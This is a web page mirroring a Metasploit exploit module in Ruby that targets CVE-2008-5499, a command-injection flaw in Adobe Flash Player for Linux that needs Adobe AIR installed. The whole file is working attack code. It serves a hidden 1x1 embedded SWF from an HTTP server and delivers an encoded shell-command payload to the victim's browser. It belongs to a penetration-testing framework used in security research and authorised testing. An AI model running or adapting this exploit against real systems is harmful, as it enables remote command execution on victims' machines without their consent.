Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',

16
        'Description' => %q{

17
          This module exploits a vulnerability in Adobe Flash Player for Linux,

18
          version 10.0.12.36 and 9.0.151.0 and prior.

19
          An input validation vulnerability allows command execution when the browser

20
          loads a SWF file which contains shell metacharacters in the arguments to

21
          the ActionScript launch method.

22


23
          The victim must have Adobe AIR installed for the exploit to work. This module

24
          was tested against version 10.0.12.36 (10r12_36).

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version

29
        ],

30
        'References' => [

31
          ['CVE', '2008-5499'],

32
          ['OSVDB', '50796'],

33
          ['BID', '32896'],

34
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']

35
        ],

36
        'DefaultOptions' => {

37
          'HTTP::compression' => 'gzip',

38
          'HTTP::chunked' => true

39
        },

40
        'Platform' => 'unix', # so unix cmd exec payloads are ok

41
        'Arch' => ARCH_CMD,

42
        'Targets' => [

43
          [ 'Automatic', {}],

44
        ],

45
        'DisclosureDate' => '2008-12-17',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Stability' => [CRASH_SERVICE_DOWN],

49
          'SideEffects' => [],

50
          'Reliability' => [REPEATABLE_SESSION]

51
        }

52
      )

53
    )

54
  end

55


56
  def exploit

57
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')

58
    @swf = File.binread(path)

59


60
    super

61
  end

62


63
  def on_request_uri(cli, request)

64
    msg = "#{cli.peerhost.ljust(16)} #{shortname}"

65
    trigger = @swf

66
    trigger_file = rand_text_alpha(3..8) + '.swf'

67


68
    obj_id = rand_text_alpha(3..8)

69


70
    if request.uri.match(/\.swf/i)

71
      print_status("#{msg} Sending Exploit SWF")

72
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })

73
      return

74
    end

75


76
    if request.uri.match(/\.txt/i)

77
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })

78
      return

79
    end

80


81
    html = <<-EOS

82
    <html>

83
      <head>

84
      </head>

85
      <body>

86
      <center>

87
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

88
        <param name="movie" value="#{get_resource}#{trigger_file}" />

89
        <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"

90
          type="application/x-shockwave-flash"

91
          pluginspage="http://www.macromedia.com/go/getflashplayer">

92
        </embed>

93


94
      </object>

95
    </center>

96


97
    </body>

98
    </html>

99
    EOS

100


101
    print_status("#{msg} Sending HTML...")

102
    send_response(cli, html, { 'Content-Type' => 'text/html' })

103
  end

104
end

105


106